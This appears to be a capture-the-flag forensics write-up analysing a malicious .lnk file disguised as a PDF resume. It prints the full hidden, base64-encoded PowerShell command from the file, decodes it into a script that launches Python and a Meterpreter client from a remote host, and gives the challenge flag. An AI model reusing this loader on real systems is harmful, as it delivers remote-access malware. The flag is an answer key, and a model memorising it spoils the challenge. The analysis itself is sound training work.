A New Hire

Personal Rating: Easy

This forensics challenge starts with an .eml file and we are also provided with a docker instance that hosts a web server. Upon inspecting it in a text editor, you find this note in the message body:

note in eml file

Accessing the web server at this page, there is not much to see. The page source however revealed another web directory that could not be determined via fuzzing.

view-source:http://94.237.60.18:33370/index.php

Navigating to http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumes/ you are presented with a listable directory and a file in it:

.lnk file in listable directory

After downloading the file with wget 'http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumes/Resume.pdf .lnk' I inspected it in a text editor. As expected, malicious code was hidden inside:

Suspicious Powershell in LNK file

This command seems to be executed by the lnk file:

C:\Windows\System32\cmd.exe /c powershell.exe -W Hidden -nop -ep bypass -NoExit -E WwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJwBtAHMAZQBkAGcAZQAnACwAIAAnAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQA6ADMAMwAzADcAMAAvADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANAAvAHIAZQBzAHUAbQBlAHMAUwAvAHIAZQBzAHUAbQBlAF8AbwBmAGYAaQBjAGkAYQBsAC4AcABkAGYAJwApADsAXABcAHMAdABvAHIAYQBnAGUALgBtAGkAYwByAG8AcwBvAGYAdABjAGwAbwB1AGQAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0AQAAzADMAMwA3ADAAXAAzAGYAZQAxADYAOQAwAGQAOQA1ADUAZQA4AGYAZAAyAGEAMABiADIAOAAyADUAMAAxADUANwAwAGUAMQBmADQAXABwAHkAdABoAG8AbgAzADEAMgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIABcAFwAcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQBAADMAMwAzADcAMABcADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANABcAGMAbwBuAGYAaQBnAHMAXABjAGwAaQBlAG4AdAAuAHAAeQA=

The content of the base64 encoded script could be extracted with Cyberchef. This command is also a good alternative:

echo 'WwBTAHkAcw<SNIP>AdAAuAHAAeQA=' | base64 -d

The result is this Powershell script:

[System.Diagnostics.Process]::Start('msedge', 'http://storage.microsoftcloudservices.com:33370/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf');
\\storage.microsoftcloudservices.com@33370\3fe1690d955e8fd2a0b282501570e1f4\python312\python.exe
\\storage.microsoftcloudservices.com@33370\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py

This indicates that the "official resume" along with a standalone Python binary and a potential Python C2 client are downloaded from the web server to the victim host.

Navigating to http://94.237.60.18:33370/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf lets you download the actual PDF file. Consistent with the story, we obtained the official resume of the evil mastermind Lord Malakar.

Lord Malakar Resume

For good measures I quickly checked if there is anything obviously suspicious in the PDF file. This was not the case.

exiftool resume_official.pdf
<SNIP>
PTEX Fullbanner                 : This is pdfTeX, Version 3.141592653-2.6-1.40.26 (TeX Live 2024) kpathsea version 6.4.0
Producer                        : pdfTeX-1.40.26
<SNIP>

The next interesting part to look at was the file client.py . It could also be downloaded with wget or by navigating to the according URL at "\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py". Inspecting it in a text editor, you could see two base64 blobs. One of them is called "key". Decoding it yielded the flag!

echo 'SFRCe<SNIP>F9Cg==' | base64 -d
HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}

Decoding the larger base64 blob only shows raw, unreadable data, but the final lines of the script explain why:

Meterpreter Client

As suspected, the client.py serves as a connection agent for a meterpreter session.

PreviousTales from EldoriaNextCave Expedition

Last updated